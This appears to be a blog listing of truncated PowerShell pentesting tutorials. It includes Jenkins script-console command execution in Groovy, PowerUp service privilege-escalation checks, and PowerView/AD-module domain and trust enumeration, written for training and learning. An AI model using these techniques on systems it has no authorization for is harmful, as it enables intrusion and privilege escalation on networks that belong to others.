Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 2

As i consider the Jenkin is already present on server and we have the credential with us After login go to : http://192.168.65.195:8080/scirpts/ type this below mention command and click on run Code : def sout = new StringBuffer(), serr = new StringBuffer() def proc = ‘whoami’.execute() proc.consumeProcessOutput(sout,serr) proc.waitForOrKill(1000) println “out>$sout err> $serr” Now try […]

Powershell * POWERSHELL SECURITY

Local Privilege Escalation Part 1

Services issues using powerup: PS C:\Users\victim.SECURITY\Downloads\ > Get-ServiceUnquoted –verbose Get services where the current user can write to its binary path or change arguments to the binary: Get services where the current user can write to its binary path or change arguments to the binary: PS C:\Users\victim.SECURITY\Downloads\ > Get-ModifiableServiceFile -Verbose Get the services whose configuration […]

Powershell * POWERSHELL SECURITY

Domain Enumeration Part 4

Domain Trust Mapping : Get a list of all domain trusts for the current domain : PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetDomainTrust -domain ujjtest.security.local PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADTrust -Identity setest.local PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> (Get-ADForest).domains Forest Mapping : Get all global catalogs for the current forest : Map trusts of a forest : PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> […]

Powershell * POWERSHELL SECURITY

Powershell Enum of Active Directory (Part 2)

Get a list of computer in the current domain : PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -OperatingSystem “*” PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Ping PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer -FullData AD : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADComputer -Filter * | select Name PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADComputer -Filter * -Properties * Domain enumeration : Get all the groups in the current domain : […]